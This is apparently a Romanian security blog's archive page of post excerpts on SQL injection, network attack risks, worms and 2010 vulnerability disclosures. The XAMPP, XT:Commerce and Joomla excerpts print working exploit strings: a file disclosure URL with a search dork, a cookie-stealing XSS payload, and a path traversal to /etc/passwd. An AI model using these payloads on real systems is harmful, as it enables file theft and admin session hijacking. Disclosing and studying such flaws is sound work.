Arhive Taguri: exploits
Tutorial SQL Inject - Securitatea Informatica

Tutorial SQL Inject

1. Introducere: Astazi, foarte multe aplicatii web isi pastreaza datele in baza de date , deoarece acest lucru permite generarea de pagini dinamice. Aplicatia web primeste de la utilizator date, aceste date sunt utilizate de aplicatie/script pentru a genera o cerere la baza de date. In majoritatea cazurilor pentru a genera cereri la baza de [...]

Citeşte mai mult
Vulnerabilitati multiple XAMPP 1.73 - Securitatea Informatica

Vulnerabilitati multiple XAMPP 1.73

Data: 31/10/2010 Exploit: Remote file disclosure XAMPP 1.73 este vulnerabil la un atac de tip remote file disclosure. http://[host]/xampp/showcode.php/c:boot.ini?showcode=1 showcode.php: Problema: showcode.php se bazeaza pe basename($_SERVER['PHP_SELF']) pentru a intoarce calea. Cross Site Scripting Google Hack inurl:xampp/biorhythm.php

Citeşte mai mult
Riscurile de atac asupra securitatii sistemelor informationale - Securitatea Informatica

Riscurile de atac asupra securitatii sistemelor informationale

În mai puţin de generaţie, introducerea calculatoarelor, virtual, în fiecare dimensiune a societăţii a schimbat semnificativ modul în care oamenii şi organizaţiile obţin sau diseminează informaţii ori desfăşoară afaceri, permiţând mai mare eficienţă, un control operaţional sporit şi un acces rapid la informaţii. Alături de multe beneficii, însă, calculatoarele şi interconectarea acestora prezintă şi aspecte [...]

Citeşte mai mult
Securitatea IT si viermii internet - Securitatea Informatica

Securitatea IT si viermii internet

Internet este o structura deschisa, la care se poate conecta un numar mare de calculatoare fiind deci greu de controlat. De aceea putem vorbi de vulnerabilitatea retelelor manifestata pe variate planuri. Un aspect crucial al retelelor de calculatoare, în special al comunicatiilor prin Internet îl constituie securitatea informatiilor. Categorii de atacuri asupra retelelor Amenintarile la [...]

Citeşte mai mult
XT:Commerce 3.04 SP2.1 – Vulnerabilitate XSS - Securitatea Informatica

XT:Commerce 3.04 SP2.1 – Vulnerabilitate XSS

Data: 11 noiembrie 2010 Descriere: XT: Comert este predispus la atacuri XSS. Un atacator trebuie să creeze un cont, sa injecteze javascript in campul “street” (ex.: “><script type=”text/javascript”>alert (document.cookie) </script>) şi sa plaseze o comandă. În cazul în care administratorul deschide comanda în backend-ul magazinului, codul javascript va fi executat. Prin obtinerea cookie al admin, [...]

Citeşte mai mult
Joomla com_img – Local File Inclusion - Securitatea Informatica

Joomla com_img – Local File Inclusion

Data: 10 noiembrie 2010 Descriere: Vulnerabilitate LFI (includere de fisier local) in componenta Joomla com_img. Exploit: http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00

Citeşte mai mult
Pagina 1 din 212
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro